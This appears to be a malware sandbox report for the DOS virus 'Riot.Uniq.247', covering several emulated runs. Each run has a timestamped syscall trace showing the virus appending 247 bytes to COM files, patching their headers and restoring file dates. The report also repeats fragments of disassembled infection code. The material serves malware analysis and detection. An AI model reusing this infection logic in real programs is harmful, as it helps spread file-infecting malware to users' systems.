Sample viewer

vx.netlux.org/Virus.DOS.Riot.Uniq.247

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:53:49.821401895Z 26 PC: 13e83 | Set disk transfer address
2018-12-17T21:53:49.823554037Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:49.825835683Z 61 PC: 13ec0 | Open file (Filename = 'e:\infectme.com')
2018-12-17T21:53:49.828362786Z 78 PC: 13e92 | Find first file
2018-12-17T21:53:49.834447825Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:49.85137015Z 61 PC: 13ec0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:53:49.863395988Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:49.86506324Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:49.876130663Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:49.877537565Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:49.87978246Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:49.888728754Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:49.890056786Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:49.896497038Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:49.906077417Z 62 PC: 13f18 | Close file
2018-12-17T21:53:49.914077264Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:49.916642259Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:49.927090597Z 61 PC: 13ec0 | Open file (Filename = 'PRINT.COM')
2018-12-17T21:53:49.933926467Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:49.935657893Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:49.945210471Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:49.947001789Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:49.949567486Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:49.952894542Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:49.956235661Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:49.958985322Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:49.960598171Z 62 PC: 13f18 | Close file
2018-12-17T21:53:49.968714732Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:49.971673081Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:49.981519913Z 61 PC: 13ec0 | Open file (Filename = 'HELLO.COM')
2018-12-17T21:53:49.98948957Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:49.991567562Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:49.99818436Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:50.001170997Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:50.003627256Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:50.006743827Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:50.009165283Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:50.012399194Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.014196867Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.021914001Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.02556075Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:50.035386528Z 61 PC: 13ec0 | Open file (Filename = 'PHANG.COM')
2018-12-17T21:53:50.042658356Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:50.045218907Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:50.051721666Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:50.053221036Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:50.056653118Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:50.061672826Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:50.063239541Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:50.066716365Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.068702872Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.076475098Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.079475274Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:50.089912968Z 61 PC: 13ec0 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T21:53:50.096579912Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:50.098153334Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:50.106273671Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:50.108675945Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:50.110901766Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:50.114647984Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:50.115929547Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:50.118517479Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.125014668Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.132106522Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.1345857Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:50.144990762Z 61 PC: 13ec0 | Open file (Filename = 'MANDEL.COM')
2018-12-17T21:53:50.151445864Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:50.152896945Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:50.160141206Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:50.161345687Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:50.163838411Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:50.172971518Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:50.17442897Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:50.181233482Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.18319317Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.191385627Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.193861408Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:50.204241832Z 61 PC: 13ec0 | Open file (Filename = 'PAH.COM')
2018-12-17T21:53:50.210877684Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:50.212163715Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:50.219576807Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:50.221284663Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:50.223960433Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:50.227447651Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:50.229240354Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:50.231892782Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.234894723Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.24279609Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.245842677Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:50.25644042Z 61 PC: 13ec0 | Open file (Filename = 'TEST.COM')
2018-12-17T21:53:50.263208795Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:50.264479083Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:50.267685362Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.269773395Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.276929203Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.279739534Z 44 PC: 13e9f | Get time 0x13e9f: cmp dl, 2
0x13ea2: ja 0x13ea4
0x13ea4: mov dx, 0x80
0x13ea7: mov ah, 0x1a
0x13ea9: int 0x21
0x13eab: mov di, 0x100
0x13eae: push di
0x13eaf: ret
0x13eb0: lea dx, word ptr [bp + 0x215]
0x13eb4: mov ax, 0x4301
0x13eb7: xor cx, cx
0x13eb9: int 0x21
0x13ebb: mov ax, 0x3d02
0x13ebe: int 0x21
0x13ec0: jb 0x13f18
0x13ec2: xchg ax, bx
0x13ec3: mov ax, 0x5700
0x13ec6: int 0x21
0x13ec8: push cx
0x13ec9: push dx
2018-12-17T21:53:50.282521024Z 26 PC: 13eab | Set disk transfer address
2018-12-17T21:53:50.284352507Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T21:53:50.290132228Z 0 PC: 12a89 | Program terminate

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":410,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:40:52.517484464Z 26 PC: 13e83 | Set disk transfer address
2018-12-25T11:40:52.51965826Z 67 PC: 13ebb | Get or set file attributes
2018-12-25T11:40:52.521573641Z 61 PC: 13ec0 | Open file (Filename = 'e:\infectme.com')
2018-12-25T11:40:52.531355228Z 78 PC: 13e92 | Find first file
2018-12-25T11:40:52.538286658Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.55438636Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.56135656Z 87 PC: 13ec8 | Get or set file date and time
2018-12-25T11:40:52.562543731Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:40:52.569046243Z 66 PC: 13ee4 | Move file pointer
2018-12-25T11:40:52.570426638Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-25T11:40:52.572487356Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-25T11:40:52.580849801Z 66 PC: 13f02 | Move file pointer
2018-12-25T11:40:52.582054647Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:40:52.588223461Z 87 PC: 13f14 | Get or set file date and time
2018-12-25T11:40:52.589825671Z 62 PC: 13f18 | Close file
2018-12-25T11:40:52.598195265Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.599844836Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.606934842Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.613688198Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.615272926Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.622253468Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.623598294Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.625714803Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.628483835Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.629838825Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.632329157Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.634094349Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.641677898Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.644216162Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.653999063Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.660485487Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.661810417Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.668482076Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.669831305Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.672067893Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.675321347Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.676628303Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.679031244Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.680920434Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.688074269Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.690603819Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.701017579Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.712522229Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.713810438Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.720020904Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.721144351Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.722571852Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.724406448Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.725727282Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.727362608Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.728503749Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.733487673Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.73530681Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.741747343Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.746282703Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.747450072Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.753399546Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.754670172Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.756712366Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.759417953Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.760670167Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.763006939Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.764296805Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.771722054Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.774870845Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.784383947Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.79088303Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.792075765Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.798525735Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.800258358Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.802690881Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.811042154Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.812944443Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.81938271Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.821080612Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.829164792Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.831832006Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.841525168Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.848084404Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.84924393Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.855313044Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.857432309Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.859799798Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.862788438Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.865237732Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.867969166Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.869578976Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.877231442Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.879846977Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.889290114Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.896728841Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.897913806Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.904398192Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.906528427Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.913491346Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.916270015Z 44 PC: 13e9f | Get time 0x13e9f: cmp dl, 2
0x13ea2: ja 0x13ea4
0x13ea4: mov dx, 0x80
0x13ea7: mov ah, 0x1a
0x13ea9: int 0x21
0x13eab: mov di, 0x100
0x13eae: push di
0x13eaf: ret
0x13eb0: lea dx, word ptr [bp + 0x215]
0x13eb4: mov ax, 0x4301
0x13eb7: xor cx, cx
0x13eb9: int 0x21
0x13ebb: mov ax, 0x3d02
0x13ebe: int 0x21
0x13ec0: jb 0x13f18
0x13ec2: xchg ax, bx
0x13ec3: mov ax, 0x5700
0x13ec6: int 0x21
0x13ec8: push cx
0x13ec9: push dx
2018-12-25T11:40:52.919184902Z 26 PC: 13eab | Set disk transfer address
2018-12-25T11:40:52.92044534Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T11:40:52.926050136Z 0 PC: 12a89 | Program terminate

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":410,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:40:52.621572125Z 26 PC: 13e83 | Set disk transfer address
2018-12-25T11:40:52.623576285Z 67 PC: 13ebb | Get or set file attributes
2018-12-25T11:40:52.625441905Z 61 PC: 13ec0 | Open file (Filename = 'e:\infectme.com')
2018-12-25T11:40:52.627680453Z 78 PC: 13e92 | Find first file
2018-12-25T11:40:52.634029008Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.649759045Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.661025602Z 87 PC: 13ec8 | Get or set file date and time
2018-12-25T11:40:52.662883364Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:40:52.669593854Z 66 PC: 13ee4 | Move file pointer
2018-12-25T11:40:52.670909107Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-25T11:40:52.673308508Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-25T11:40:52.681761129Z 66 PC: 13f02 | Move file pointer
2018-12-25T11:40:52.683153682Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:40:52.68956388Z 87 PC: 13f14 | Get or set file date and time
2018-12-25T11:40:52.692019901Z 62 PC: 13f18 | Close file
2018-12-25T11:40:52.699625882Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.702320864Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.712314176Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.718900816Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.720588425Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.727688594Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.729573555Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.732132505Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.735836937Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.738316001Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.740915488Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.743359325Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.759136999Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.762877735Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.774854065Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.781729559Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.783463755Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.790738202Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.79258123Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.794703988Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.79793512Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.799337616Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.801836536Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.803938628Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.811107976Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.813639814Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.824283789Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.831511605Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.83321509Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.839876587Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.841103339Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.843132814Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.846390927Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.847689735Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.850112964Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.851682953Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.859119722Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.861546677Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.871006644Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.876118457Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.877394559Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.881574099Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.882814563Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.884495571Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.887925446Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.889626411Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.892021081Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.893320849Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.900878063Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.90334943Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.912672659Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.919315323Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.920690154Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.926749852Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.928610136Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.930613408Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.936600638Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.938808276Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.945084406Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.94646076Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.954761322Z 79 PC: 13e92 | Find next file (See above)
